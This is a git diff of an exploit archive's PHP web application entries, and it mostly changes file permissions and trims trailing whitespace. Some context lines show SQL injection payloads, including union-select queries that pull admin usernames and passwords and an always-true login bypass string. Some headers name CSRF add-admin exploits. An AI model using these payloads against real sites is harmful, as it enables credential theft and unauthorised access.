end of file diff --git a/platforms/php/webapps/15892.html b/platforms/php/webapps/15892.html old mode 100755 new mode 100644 index 34ed090d7..3b2cef43e --- a/platforms/php/webapps/15892.html +++ b/platforms/php/webapps/15892.html @@ -23,9 +23,4 @@ YourTube v1.0 CSRF Vulnerability (Add User) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15896.txt b/platforms/php/webapps/15896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15902.html b/platforms/php/webapps/15902.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15907.txt b/platforms/php/webapps/15907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15917.txt b/platforms/php/webapps/15917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15920.txt b/platforms/php/webapps/15920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15921.txt b/platforms/php/webapps/15921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15922.txt b/platforms/php/webapps/15922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15923.txt b/platforms/php/webapps/15923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15924.txt b/platforms/php/webapps/15924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15938.txt b/platforms/php/webapps/15938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15939.txt b/platforms/php/webapps/15939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15942.txt b/platforms/php/webapps/15942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15943.txt b/platforms/php/webapps/15943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15945.txt b/platforms/php/webapps/15945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1595.php b/platforms/php/webapps/1595.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15958.txt b/platforms/php/webapps/15958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15960.txt b/platforms/php/webapps/15960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15961.txt b/platforms/php/webapps/15961.txt old mode 100755 new mode 100644 index c593797c2..a852c8fd8 --- a/platforms/php/webapps/15961.txt +++ b/platforms/php/webapps/15961.txt @@ -28,4 +28,4 @@ http://127.0.0.1/index.php?page=profile&id=' or 'a'='a 1] Amforked() : My Mentor. 2] The Blue Genius : My Boss. 3] www.orchidseven.com -4] www.malcon.org \ No newline at end of file +4] www.malcon.org \ No newline at end of file diff --git a/platforms/php/webapps/15966.txt b/platforms/php/webapps/15966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15967.txt b/platforms/php/webapps/15967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15968.txt b/platforms/php/webapps/15968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15969.txt b/platforms/php/webapps/15969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15970.txt b/platforms/php/webapps/15970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15971.txt b/platforms/php/webapps/15971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15979.txt b/platforms/php/webapps/15979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15981.txt b/platforms/php/webapps/15981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15989.txt b/platforms/php/webapps/15989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15993.html b/platforms/php/webapps/15993.html old mode 100755 new mode 100644 index 015dd7205..8a41c1c2b --- a/platforms/php/webapps/15993.html +++ b/platforms/php/webapps/15993.html @@ -60,4 +60,4 @@ | SadHaCk3r . The Injector | | Lagripe-Dz . FoX Hacker | #-----------------------------------# - www.Sec4Ever.Com | www.v4-team.com \ No newline at end of file + www.Sec4Ever.Com | www.v4-team.com \ No newline at end of file diff --git a/platforms/php/webapps/15995.txt b/platforms/php/webapps/15995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15996.txt b/platforms/php/webapps/15996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15999.txt b/platforms/php/webapps/15999.txt old mode 100755 new mode 100644 index 2008b0109..e5aea7585 --- a/platforms/php/webapps/15999.txt +++ b/platforms/php/webapps/15999.txt @@ -17,5 +17,4 @@ == [#] Greetings: darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims .. -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/1600.php b/platforms/php/webapps/1600.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16000.txt b/platforms/php/webapps/16000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16001.txt b/platforms/php/webapps/16001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16003.txt b/platforms/php/webapps/16003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16004.txt b/platforms/php/webapps/16004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16007.txt b/platforms/php/webapps/16007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16010.txt b/platforms/php/webapps/16010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16011.txt b/platforms/php/webapps/16011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16013.html b/platforms/php/webapps/16013.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16016.txt b/platforms/php/webapps/16016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16018.txt b/platforms/php/webapps/16018.txt old mode 100755 new mode 100644 index e4b79b59e..f709ccd32 --- a/platforms/php/webapps/16018.txt +++ b/platforms/php/webapps/16018.txt @@ -16,5 +16,4 @@ == [#]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/16019.txt b/platforms/php/webapps/16019.txt old mode 100755 new mode 100644 index 75d2212a8..8bc54f2d1 --- a/platforms/php/webapps/16019.txt +++ b/platforms/php/webapps/16019.txt @@ -58,5 +58,4 @@ Already Tested on Win Xp # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- - \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/16020.txt b/platforms/php/webapps/16020.txt old mode 100755 new mode 100644 index 8dd08306a..82081a7da --- a/platforms/php/webapps/16020.txt +++ b/platforms/php/webapps/16020.txt @@ -16,5 +16,4 @@ == [+]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/16027.txt b/platforms/php/webapps/16027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16028.txt b/platforms/php/webapps/16028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16034.txt b/platforms/php/webapps/16034.txt old mode 100755 new mode 100644 index a0cc1e51f..ca4c4740f --- a/platforms/php/webapps/16034.txt +++ b/platforms/php/webapps/16034.txt @@ -17,5 +17,4 @@ == [|]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/16037.html b/platforms/php/webapps/16037.html old mode 100755 new mode 100644 index a91a718a9..b08de6db0 --- a/platforms/php/webapps/16037.html +++ b/platforms/php/webapps/16037.html @@ -31,9 +31,4 @@ PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin) </body> </html> -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16039.txt b/platforms/php/webapps/16039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16044.txt b/platforms/php/webapps/16044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16047.txt b/platforms/php/webapps/16047.txt old mode 100755 new mode 100644 index fcb7d2c22..f7baef675 --- a/platforms/php/webapps/16047.txt +++ b/platforms/php/webapps/16047.txt @@ -21,9 +21,4 @@ www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user, www.site.com/admin/login.php -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16049.txt b/platforms/php/webapps/16049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1605.php b/platforms/php/webapps/1605.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16050.txt b/platforms/php/webapps/16050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16051.txt b/platforms/php/webapps/16051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16058.txt b/platforms/php/webapps/16058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16059.txt b/platforms/php/webapps/16059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16060.txt b/platforms/php/webapps/16060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16061.txt b/platforms/php/webapps/16061.txt old mode 100755 new mode 100644 index e9d0d0c05..aa78c8c5b --- a/platforms/php/webapps/16061.txt +++ b/platforms/php/webapps/16061.txt @@ -15,4 +15,4 @@ == [|]Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/16062.txt b/platforms/php/webapps/16062.txt old mode 100755 new mode 100644 index 2610b9e80..74f4a52cf --- a/platforms/php/webapps/16062.txt +++ b/platforms/php/webapps/16062.txt @@ -18,6 +18,4 @@ after getting the username and the password you can login to admin panel [path]/admin == [-]Greetings: -darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" - - \ No newline at end of file +darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" \ No newline at end of file diff --git a/platforms/php/webapps/16069.txt b/platforms/php/webapps/16069.txt old mode 100755 new mode 100644 index 53425ffc8..762c38d60 --- a/platforms/php/webapps/16069.txt +++ b/platforms/php/webapps/16069.txt @@ -15,5 +15,4 @@ Link: http://www.softbizsolutions.com/script-directory-software.php == Greetings: darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis" -== - \ No newline at end of file +== \ No newline at end of file diff --git a/platforms/php/webapps/16074.txt b/platforms/php/webapps/16074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16076.txt b/platforms/php/webapps/16076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16077.txt b/platforms/php/webapps/16077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1608.php b/platforms/php/webapps/1608.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16080.txt b/platforms/php/webapps/16080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16087.txt b/platforms/php/webapps/16087.txt old mode 100755 new mode 100644 index 89f74c0aa..97c8fb87b --- a/platforms/php/webapps/16087.txt +++ b/platforms/php/webapps/16087.txt @@ -62,6 +62,4 @@ http://www.target.com[path pmb]/index.php?lvl=coll_see&id=-1/**/union/**/select+ #Site : http://vbspiders.com #Critical Lvl : Dangerous #Mail: nourie.tlm[at]gmail.com ---------------------- Hack To Learn, Learn To Hack---------------------------- - - \ No newline at end of file +--------------------- Hack To Learn, Learn To Hack---------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/16088.php b/platforms/php/webapps/16088.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16090.txt b/platforms/php/webapps/16090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16091.txt b/platforms/php/webapps/16091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16094.txt b/platforms/php/webapps/16094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16096.txt b/platforms/php/webapps/16096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16097.txt b/platforms/php/webapps/16097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1610.txt b/platforms/php/webapps/1610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16102.txt b/platforms/php/webapps/16102.txt old mode 100755 new mode 100644 index 9807039ee..9ecf926f8 --- a/platforms/php/webapps/16102.txt +++ b/platforms/php/webapps/16102.txt @@ -14,4 +14,4 @@ Greet'z 2 Jiko | SadHaCKEr | T0RoB0xHaCKEr | Cyb3r-DevIL | Tw1sT3r | X-Shadow | FreeMAN | Evil SheLL | Sec4ever | Jago-Dz Special Thanks 2 AtT4CKxT3rR0rIsT | OSSI -Sepcial Fuck [ _!_ ] 2 Root-Ar.CoM \ No newline at end of file +Sepcial Fuck [ _!_ ] 2 Root-Ar.CoM \ No newline at end of file diff --git a/platforms/php/webapps/16106.txt b/platforms/php/webapps/16106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16109.txt b/platforms/php/webapps/16109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16110.txt b/platforms/php/webapps/16110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16113.txt b/platforms/php/webapps/16113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16114.txt b/platforms/php/webapps/16114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16116.txt b/platforms/php/webapps/16116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16117.txt b/platforms/php/webapps/16117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1612.php b/platforms/php/webapps/1612.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16122.txt b/platforms/php/webapps/16122.txt old mode 100755 new mode 100644 index a4768a8c2..8479b4302 --- a/platforms/php/webapps/16122.txt +++ b/platforms/php/webapps/16122.txt @@ -23,7 +23,4 @@ Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password ###################################################################### -txt - - - \ No newline at end of file +txt \ No newline at end of file diff --git a/platforms/php/webapps/16127.txt b/platforms/php/webapps/16127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16128.txt b/platforms/php/webapps/16128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16130.txt b/platforms/php/webapps/16130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16131.txt b/platforms/php/webapps/16131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16134.txt b/platforms/php/webapps/16134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16135.html b/platforms/php/webapps/16135.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16136.html b/platforms/php/webapps/16136.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16139.txt b/platforms/php/webapps/16139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16140.txt b/platforms/php/webapps/16140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16143.txt b/platforms/php/webapps/16143.txt old mode 100755 new mode 100644 index 792c9aa0d..a6b27bec1 --- a/platforms/php/webapps/16143.txt +++ b/platforms/php/webapps/16143.txt @@ -13,4 +13,4 @@ http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11, # Greetings: -IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory \ No newline at end of file +IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory \ No newline at end of file diff --git a/platforms/php/webapps/16144.txt b/platforms/php/webapps/16144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16148.txt b/platforms/php/webapps/16148.txt old mode 100755 new mode 100644 index 82f68888e..2c46aa447 --- a/platforms/php/webapps/16148.txt +++ b/platforms/php/webapps/16148.txt @@ -36,4 +36,4 @@ http://<SITE>/sourcebans/index.php?p=submit #Credits: Sw1tCh -#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, \ No newline at end of file +#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, \ No newline at end of file diff --git a/platforms/php/webapps/16154.txt b/platforms/php/webapps/16154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16155.txt b/platforms/php/webapps/16155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16156.txt b/platforms/php/webapps/16156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16158.txt b/platforms/php/webapps/16158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16159.txt b/platforms/php/webapps/16159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16160.txt b/platforms/php/webapps/16160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16165.txt b/platforms/php/webapps/16165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16167.txt b/platforms/php/webapps/16167.txt old mode 100755 new mode 100644 index 4ca5f238d..4e2118289 --- a/platforms/php/webapps/16167.txt +++ b/platforms/php/webapps/16167.txt @@ -26,8 +26,4 @@ IV. Credits - God - bawahtanah_sii : tenro, sality23, em32, tdos, kiwill and my-Org - XCODE - semua [komunitas IT dan netter] underground INDONESIA -- All Friend's and Enemy who know me - - - - \ No newline at end of file +- All Friend's and Enemy who know me \ No newline at end of file diff --git a/platforms/php/webapps/16168.txt b/platforms/php/webapps/16168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1617.php b/platforms/php/webapps/1617.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16170.txt b/platforms/php/webapps/16170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16172.txt b/platforms/php/webapps/16172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16175.txt b/platforms/php/webapps/16175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1618.c b/platforms/php/webapps/1618.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16181.txt b/platforms/php/webapps/16181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16183.txt b/platforms/php/webapps/16183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16196.txt b/platforms/php/webapps/16196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16197.txt b/platforms/php/webapps/16197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16198.txt b/platforms/php/webapps/16198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16199.txt b/platforms/php/webapps/16199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16202.txt b/platforms/php/webapps/16202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16206.txt b/platforms/php/webapps/16206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16207.txt b/platforms/php/webapps/16207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1621.php b/platforms/php/webapps/1621.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16213.txt b/platforms/php/webapps/16213.txt old mode 100755 new mode 100644 index c95f2d006..9f2531a6d --- a/platforms/php/webapps/16213.txt +++ b/platforms/php/webapps/16213.txt @@ -14,4 +14,4 @@ Hyena Cart (index.php) Sql Injection Vulnerability www.site.com/index.php?info=null[Sql] www.site.com/index.php?info=null+and+1=2+union+select+1,version(),3,4,5,6 -#################################################################### \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16214.txt b/platforms/php/webapps/16214.txt old mode 100755 new mode 100644 index 771cfb4c2..3d0d435fc --- a/platforms/php/webapps/16214.txt +++ b/platforms/php/webapps/16214.txt @@ -12,4 +12,4 @@ tplSoccerStats (player.php) Sql Injection Vulnerability www.site.com/player.php?id==null[Sql] www.site.com/player.php?id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10-- - -#################################################################### \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16217.txt b/platforms/php/webapps/16217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16218.txt b/platforms/php/webapps/16218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16221.txt b/platforms/php/webapps/16221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16222.txt b/platforms/php/webapps/16222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16223.txt b/platforms/php/webapps/16223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16232.txt b/platforms/php/webapps/16232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16233.txt b/platforms/php/webapps/16233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16235.txt b/platforms/php/webapps/16235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16236.txt b/platforms/php/webapps/16236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16247.txt b/platforms/php/webapps/16247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16249.txt b/platforms/php/webapps/16249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16250.txt b/platforms/php/webapps/16250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16251.txt b/platforms/php/webapps/16251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16256.txt b/platforms/php/webapps/16256.txt old mode 100755 new mode 100644 index 065b6bfcb..8395d2e48 --- a/platforms/php/webapps/16256.txt +++ b/platforms/php/webapps/16256.txt @@ -14,6 +14,4 @@ www.site.com/archives.php?pid=null[Sql] www.site.com/page.php?pid=null+and+1=2+union+select+concat(username,0x3a,psword)+from+tbladmin_users www.site.com/archives.php?pid=null+and+1=2+union+select+1,2,3,concat(username,0x3a,psword),5,6,7,8,9,10,11+from+tbladmin_users -#################################################################### - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16257.txt b/platforms/php/webapps/16257.txt old mode 100755 new mode 100644 index 01293b8ca..8f31af74f --- a/platforms/php/webapps/16257.txt +++ b/platforms/php/webapps/16257.txt @@ -12,6 +12,4 @@ SnapProof (page.php) Sql Injection Vulnerability www.site.com/page.php?pID=null[Sql] www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4 -#################################################################### - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16265.txt b/platforms/php/webapps/16265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16266.txt b/platforms/php/webapps/16266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16267.txt b/platforms/php/webapps/16267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1627.php b/platforms/php/webapps/1627.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16272.txt b/platforms/php/webapps/16272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16273.php b/platforms/php/webapps/16273.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16276.txt b/platforms/php/webapps/16276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16279.txt b/platforms/php/webapps/16279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16281.txt b/platforms/php/webapps/16281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1631.php b/platforms/php/webapps/1631.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1646.php b/platforms/php/webapps/1646.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1647.php b/platforms/php/webapps/1647.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1652.php b/platforms/php/webapps/1652.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1653.txt b/platforms/php/webapps/1653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1654.txt b/platforms/php/webapps/1654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1655.php b/platforms/php/webapps/1655.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1656.txt b/platforms/php/webapps/1656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1659.php b/platforms/php/webapps/1659.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1660.pm b/platforms/php/webapps/1660.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1662.php b/platforms/php/webapps/1662.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1663.php b/platforms/php/webapps/1663.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1666.php b/platforms/php/webapps/1666.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1668.php b/platforms/php/webapps/1668.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1673.php b/platforms/php/webapps/1673.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1674.txt b/platforms/php/webapps/1674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1678.php b/platforms/php/webapps/1678.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1682.php b/platforms/php/webapps/1682.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1683.php b/platforms/php/webapps/1683.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1687.txt b/platforms/php/webapps/1687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16931.html b/platforms/php/webapps/16931.html old mode 100755 new mode 100644 index 9e7fdb538..0ed1d0cff --- a/platforms/php/webapps/16931.html +++ b/platforms/php/webapps/16931.html @@ -24,4 +24,4 @@ N-13 News 4.0 CSRF Vulnerability (Add Admin) </body> </html> -#################################################################### \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/16933.txt b/platforms/php/webapps/16933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16934.pl b/platforms/php/webapps/16934.pl index 9092d6aba..508887a5e 100755 --- a/platforms/php/webapps/16934.pl +++ b/platforms/php/webapps/16934.pl @@ -77,6 +77,4 @@ for($i=1;$i<=$ARGV[3];$i++){ print v_request('Email: ','email','user','userid='.$2); } -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/16935.txt b/platforms/php/webapps/16935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16937.pl b/platforms/php/webapps/16937.pl index 442b7f0c7..174164e94 100755 --- a/platforms/php/webapps/16937.pl +++ b/platforms/php/webapps/16937.pl @@ -34,7 +34,4 @@ my $response = $ua->get($ARGV[0].'/eggavatar.php?eggavatar.php?do=showeggs&u=1&o } else { die $response->status_line; - } - - - \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/php/webapps/16938.txt b/platforms/php/webapps/16938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16946.txt b/platforms/php/webapps/16946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16947.txt b/platforms/php/webapps/16947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16948.txt b/platforms/php/webapps/16948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16949.php b/platforms/php/webapps/16949.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16950.txt b/platforms/php/webapps/16950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16954.txt b/platforms/php/webapps/16954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16963.txt b/platforms/php/webapps/16963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16968.txt b/platforms/php/webapps/16968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16969.txt b/platforms/php/webapps/16969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1697.php b/platforms/php/webapps/1697.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1698.php b/platforms/php/webapps/1698.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16982.txt b/platforms/php/webapps/16982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16987.txt b/platforms/php/webapps/16987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16988.txt b/platforms/php/webapps/16988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16989.txt b/platforms/php/webapps/16989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1699.txt b/platforms/php/webapps/1699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16992.txt b/platforms/php/webapps/16992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16995.txt b/platforms/php/webapps/16995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/16997.txt b/platforms/php/webapps/16997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17000.txt b/platforms/php/webapps/17000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17002.txt b/platforms/php/webapps/17002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17005.txt b/platforms/php/webapps/17005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17006.txt b/platforms/php/webapps/17006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17007.txt b/platforms/php/webapps/17007.txt old mode 100755 new mode 100644 index 5577d6dac..1b3197591 --- a/platforms/php/webapps/17007.txt +++ b/platforms/php/webapps/17007.txt @@ -115,6 +115,4 @@ Vulnerable Javascript Source Code: [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. -[+] Malang Cyber Crew & Magelang Cyber Community - - \ No newline at end of file +[+] Malang Cyber Crew & Magelang Cyber Community \ No newline at end of file diff --git a/platforms/php/webapps/17009.txt b/platforms/php/webapps/17009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1701.php b/platforms/php/webapps/1701.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17014.txt b/platforms/php/webapps/17014.txt old mode 100755 new mode 100644 diff --git 